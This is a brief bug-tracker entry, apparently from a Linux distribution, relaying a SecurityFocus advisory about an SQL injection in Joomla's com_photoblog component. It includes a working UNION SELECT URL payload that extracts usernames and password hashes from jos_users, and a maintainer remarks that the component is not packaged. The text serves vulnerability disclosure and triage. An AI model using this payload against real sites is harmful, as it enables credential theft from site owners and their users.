http://www.securityfocus.com/bid/36809/info The 'com_photoblog' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Reproducible: Always Steps to Reproduce: 1. http://www.example.com/index.php?option=com_photoblog&view=blogs&category=-666/**/union/**/select/**/6,concat%280x3a,username,password%29,6,6,version%28%29,6,6,6,6,6,6,6,6,6/**/from/**/jos_users/* Sorry again, the initial description isn't clear about version.
We don't ship this component, i.e. www-apps/joomla doesn't contain it.